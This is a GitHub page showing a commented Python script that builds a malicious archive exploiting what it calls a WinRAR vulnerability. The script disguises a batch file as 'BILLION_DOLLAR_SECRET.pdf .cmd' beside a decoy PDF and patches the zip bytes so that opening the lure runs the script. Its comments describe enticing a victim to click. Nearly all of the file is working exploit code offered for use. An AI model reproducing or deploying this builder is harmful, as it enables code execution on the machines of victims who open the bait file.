-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit_with_comments.py
69 lines (46 loc) · 3.06 KB
/
exploit_with_comments.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
# This code makes an effort to follow PEP 8.
# Import statements for packages and dependencies we're gonna need.
import shutil
import os
# Declaring some constants here for ease of use.
# Create the constant which holds the name of the malicious script; this will eventually be renamed to match the value in HOOK, ensuring its execution as a result of WinRAR’s vulnerability.
SNEAKY_SCRIPT = "super_sneaky_evil_script.bat"
# Create a constant which looks enticing and will make the victim click on it ;).
HOOK = "BILLION_DOLLAR_SECRET.pdf"
# Create a random placeholder constant value to ensure a more readable and easily modifiable exploit.
PLACEHOLDER = "PLACEHOLDER"
# Create the constant which holds the name of the output file that is going to be generated.
OP = "BILLION_DOLLAR_SECRET.rar"
# Create a constant called HOOK_EXTENSION that stores the extension of the file defined in the HOOK constant, and converts it to a byte object. This will be used later on in the exploit.
HOOK_EXTENSION = b"." + HOOK.split(".")[-1].encode("utf-8")
# If the PLACEHOLDER directory already exists for some reason, remove it.
if os.path.exists(PLACEHOLDER):
#The part where we remove the directory.
shutil.rmtree(PLACEHOLDER, ignore_errors=True)
# Create the directory PLACEHOLDER :)
os.mkdir(PLACEHOLDER)
# We join the PLACEHOLDER path with BILLION_DOLLAR_SECRET.pdf along with an extra "A" to get "PLACEHOLDER/BILLION_DOLLAR_SECRET.pdfA" | Notice the extra "A"
SUB_DIRECTORY = os.path.join(PLACEHOLDER, HOOK + "A")
# Create the subdirectory under the placeholder directory
os.mkdir(SUB_DIRECTORY)
# Copy the malicious script file defined in the SNEAKY_SCRIPT constant inside the SUB_DIRECTORY with the name as "BILLION_DOLLAR_SECRET.pdfA.cmd". Notice the "A.cmd" which is extra here.
shutil.copy(SNEAKY_SCRIPT, os.path.join(SUB_DIRECTORY, HOOK + "A.cmd"))
# Copy the hook file defined in the HOOK constant to the parent PLACEHOLDER directory with the name as "BILLION_DOLLAR_SECRET.pdfB". Notice the "B" here.
shutil.copy(HOOK, os.path.join(PLACEHOLDER, HOOK + "B"))
# Create a zip archive named "PLACEHOLDER.zip" containing all the contents of the PLACEHOLDER directory.
shutil.make_archive(PLACEHOLDER, 'zip', PLACEHOLDER)
# Open the newly created zip file in binary mode.
with open(PLACEHOLDER + ".zip", "rb") as f:
# Read the contents of the zip file
content = f.read()
# Replace occurrences of "A" with " " and occurrences of "B" with " ".
content = content.replace(HOOK_EXTENSION + b"A", HOOK_EXTENSION + b" ").replace(HOOK_EXTENSION + b"B", HOOK_EXTENSION + b" ")
# Now, we get "BILLION_DOLLAR_SECRET.pdf .cmd" and "BILLION_DOLLAR_SECRET.pdf ".
# The former one has been converted to a .cmd file!! And the latter one is now a pdf file.
# Remove the original PLACEHOLDER.zip
os.remove(PLACEHOLDER + ".zip")
# New file with our desired Output name stored in OP constant.
with open(OP, "wb") as f:
# Write modified ZIP contents into the new Output file
f.write(content)
#After this, refer to README.md for more instructions on how to execute the exploit.